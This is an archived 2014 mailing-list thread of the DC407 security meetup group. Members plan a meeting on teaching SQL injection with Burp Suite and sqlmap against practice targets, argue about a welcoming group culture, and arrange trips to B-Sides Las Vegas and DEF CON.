Meeting in May

[cmcm...@hackucf.org]

Hey guys,

I just wanted to get conversation going about a meeting this month. Any plans yet?

[L.T. Easterly]

My schedule has flipped to early week so I'm now available on Fridays again,  so I should be available to attend.

On Mon, May 12, 2014 at 11:36 PM, <cmcm...@hackucf.org> wrote:

Hey guys,

I just wanted to get conversation going about a meeting this month. Any plans yet?

--
You received this message because you are subscribed to the Google Groups "DC407" group.
To unsubscribe from this group and stop receiving emails from it, send an email to dc407+un...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

[He Hatsalot]

I have some draft stuff for `The Intrusion Surface'. 

[fail open]

Anyone want to do a discussion on burp suite and cover SQL injection? Potentially migrate into sqlmap? Couple tools and a concept wrapped in one?

On May 12, 2014 11:36 PM, <cmcm...@hackucf.org> wrote:

Hey guys,

I just wanted to get conversation going about a meeting this month. Any plans yet?

--

[Willa Riggins]

I like this. I've done it, but I won't pretend to know everything about it. Maybe set up mutillidae or webgoat and pwn it with the tools? That or I can write a custom vuln app. Either way.

~ willa

[fail open]

I can bring metasploitable2 which has multillidae on it. Works well enough for this.

[fail open]

How long do u think the attack surfaces discussion will go? Want to give it the time it deserves and can fill in  with tool discussions.

[He Hatsalot]

If anyone does a talk on specific tools, later on in the real world the students will give up the moment the tool can't do it.  This happens all the time in the real world, hence the "Page is too dynamic" error from SQLMap. 

Why not actually teach people SQL and then teach them how to do real SQL injection?  It would likely take a similar amount of time, the difference being that they would actually be able to survive in real-world pentests.

I did a talk on SQL injection at DC407 a couple years ago.  I can grab the old materials for that if you like.

On Tue, May 13, 2014 at 8:39 AM, fail open <failo...@gmail.com> wrote:

[fail open]

I want to have the topics covered, plus discuss tools that are out there to see pros and con's of what exists but the idea is to cover all areas to help awareness in the world. As a consultant, when I have 4 days to test 1000 systems, one has to rely on everything available which means understanding the attacks but also utilizing any tools that one can.

[He Hatsalot]

I certainly hope you dont tell your client that the 1000 system scan over four days was anything resembling thorough. 

Really, you should know how to write your own sql injection tool, that way you can just fix sqlmap or another tool when it breaks or gives up.  That said, you would still have to know how to do SQL injection by hand to do that.

[He Hatsalot]

That depends on how in-depth you want it to be.  I initially planned for something like a 30-45 minute time block, but I can use more or less time as needed.

 

[fail open]

So, not everyone knows how to do everything from day one. Should you know every aspect of everything? Sure. Is that realistic for every person at every stage of their learning? Not at all. The goal here is to teach and give exposure. Its the second meeting for some people. Have to start some place.

[Tony Turner]

I'd recommend you start with sql 101 and VERY basic manual SQLi demonstrations without complicated unions and joins and introduce a tool like sqlmap for first presentation. Then follow up next time with more advanced manual testing, show blind SQLi, what to do when tools fail, etc.

[Willa Riggins]

Or we can just let the guy that volunteered to do a talk on sqlmap do his thing, and everyone that's bitching can do their own presentations. I'm kind of pissed off at the list right now. Mostly at Hatter for being a douche to failopen. I'm trying to be quiet though, because I don't want to piss anyone else off -- its not worth it.

Last meeting, honestly, was not enjoyable for me for a number of reasons. Everyone in the room was afraid to talk because there were a couple voices dominating the room and making everyone else feel like shit. That's not what this group is about. No one cares how scene you are, they just want to learn stuff. If they need to learn SQL, they aren't going to do it at a DC407. They're going to go home after seeing a presentation on sqlmap and a discussion on SQLi and learn everything on their own.

If we're going to have a damn pissing contest every month, I'm out.

[fail open]

Personally what I'd like to see is someone covering sqli, someone covering burp and someone covering sqlmap.

The idea is to get people to jump I'm and participate. I was just throwing out topic ideas. Personally I'm a fan of burp so could lead that discussion.

If someone wants to go in Nice and deep for sqli as a starting point that works. Step up and do so.

[Tony Turner]

I didn't mean to suggest that anyone was taking the wrong approach for teaching sqli, it was more of a counter to the criticism levied at not teaching ONLY the manual way. I do understand where Hatter was coming from as his points are VERY valid, but perhaps a bit misplaced for someone starting at ground 0. I think probably the biggest thing is ensuring folks feel welcome and I would encourage an inclusive culture for DC407. There is enough elitist douchebaggery at DEF CON, we don't need to bring it back to the 407. I wasn't at the last meeting so don't know if thats how it was but the efforts of the last 2-3 years through B-Sides Orlando have been focused on building community, not tearing it apart. 

I like Fails suggestion as this directly addresses my biggest issue with how we did DC407 in the past, and that was a focus on a few speakers who carried the majority of the content. I think distributing across multiple members help to bring fresh perspectives to content and empowers the members to get involved. I hope that even the new members can feel they have something to contribute. Ideally, each of us would pick a topic, and even if we don't know it very well today we go learn more about it and bring what we've learned back to the group and share the knowledge. Even newcomers should be able to do that. It wouldn't have to be a complex topic, and you shouldnt feel like you need to be an expert just to share what you've learned. That might be enough to get conversation going on the topic and several of us could contribute through that discussion. It might be a tool, a protocol, a cool new attack or vulnerability you heard about on Twitter or a mailing list.

Lastly, we all know we have some different personalties and perspectives in our community, and that's OK. Let's try not to judge, or fit anyone into a specific category. Just stay calm and keep an open mind, be respectful of everyone else, but don't be afraid to call any of us on our bullshit if we step out of line. I hope I can make the nest meeting, but I do have some heavy travel coming up so I'm not sure yet. I have every confidence in this group though, and that includes all of you. Collectively there is a lot of talent here in central FL, and as the students at UCF have shown us there is a hunger for learning here that is unrivaled.

-Tony

Tony Turner
OWASP Orlando Chapter Founder/Co-Leader
tony....@owasp.org

https://www.owasp.org/index.php/Orlando

[He Hatsalot]

Ok, this will work:

I want no future involvement.  Have fun at your next meeting.  Best of luck to you all; it looks like I'm not socially compatible with the group.

[David Swain]

Anyone here planning on going to b-sides in vegas?

-David

[Tony Turner]

I'll be there all week, definitely doing B-Sides!

[g3k]

I'm not sure to be honest. I'm gonna try to go out to the shoot. Not sure with how they moved it this year. 

[Willa Riggins]

Not this year, but BSidesLV is the best. I'll be at derby though.

[David Swain]

I stayed at the Rio last time I went out to defcon in 2012, however it cost a ton(I usually stay for like 5 or 6 days) and this is out of pocket so I think I'm gonna camp out at the Tuscany for the whole b-sides/defcon. 

I miss defcon being at the alexis park and this totally reminds me of those days.  Anyhow we should meet up, share cabs to the Rio, stories over beer, etc. I think i'm going to be there from the 5th to the 11th or something like that.

-David

[Jonathan Singer]

I'll be there! Not the whole time, but i'll make an appearance.

[g3k]

Tuscany is great, but cabs were hard to come by. Tony, Jess, Luis and I did the same thing last year. Just be aware that you may be waiting for a while. There was a couple times where we went in with other people on a limo so we could just get there and it ran about the fare of a taxi to the Rio per person. 

[Jonathan Singer]

That's why I got a car tues-thurs :)

[fail open]

I'm there Monday to Monday, will be working Bsides reg most likely or drunk by pool.

[Tony Turner]

I need cherries again. Lots of cherries! ;)

On Jun 12, 2014 4:31 PM, "Jonathan Singer" <nothin...@gmail.com> wrote: